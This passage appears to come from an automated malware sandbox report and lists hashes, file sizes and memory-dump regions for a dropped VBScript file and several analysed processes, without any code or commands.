fd0fc367d2ef0027cf935264da182389db464e5b

SHA256
0c3a5a7559e7c46a0769022433588e0db2fa750d2c871c6909332a6719f61833

SHA512
5a4202474e5f71318d95717ed4fc6887e3c5aff0aa98c951a426ad12a8a842add837b52ee99bef93f8a37a7b741c00a8e6f3979d76be4c2a92dbefb95631e129

Download Submit
C:\Users\Admin\AppData\Local\Temp\xx2.vbs

Filesize
203B

MD5
134dc516b72e8b4b3b44997273237301

SHA1
8144e4597433a94635472b46e49246af8ed6d58e

SHA256
0cfbd590d3e9320194bc954d8559d1e33d4c4f3670ebe5eb8319401f118a1d34

SHA512
ea12ba38ce76c8e96f629c18fe97e3f39cd54a787638899a2bd6ccf7500d21c31000b4ef5217ce2ce8c68d42571c609c7dd111f1f3cc18730ea48458cae7b0b9

Download Submit
memory/3100-114-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/3100-122-0x0000000005AA0000-0x0000000006044000-memory.dmp

Filesize
5.6MB

Download
memory/3100-124-0x0000000006050000-0x00000000060E2000-memory.dmp

Filesize
584KB

Download
memory/3100-125-0x0000000005A60000-0x0000000005A6A000-memory.dmp

Filesize
40KB

Download
memory/3976-1-0x00007FF991973000-0x00007FF991975000-memory.dmp

Filesize
8KB

Download
memory/3976-13-0x00007FF991970000-0x00007FF992431000-memory.dmp

Filesize
10.8MB

Download
memory/3976-12-0x00007FF991970000-0x00007FF992431000-memory.dmp

Filesize
10.8MB

Download
memory/3976-2-0x0000022EE9340000-0x0000022EE9362000-memory.dmp

Filesize
136KB

Download
memory/3976-121-0x00007FF991970000-0x00007FF992431000-memory.dmp

Filesize
10.8MB

Download
memory/5708-113-0x0000029FE15A0000-0x0000029FE15B4000-memory.dmp

Filesize
80KB

Download
memory/5708-38-0x0000029FE11B0000-0x0000029FE11C6000-memory.dmp

Filesize
88KB

Download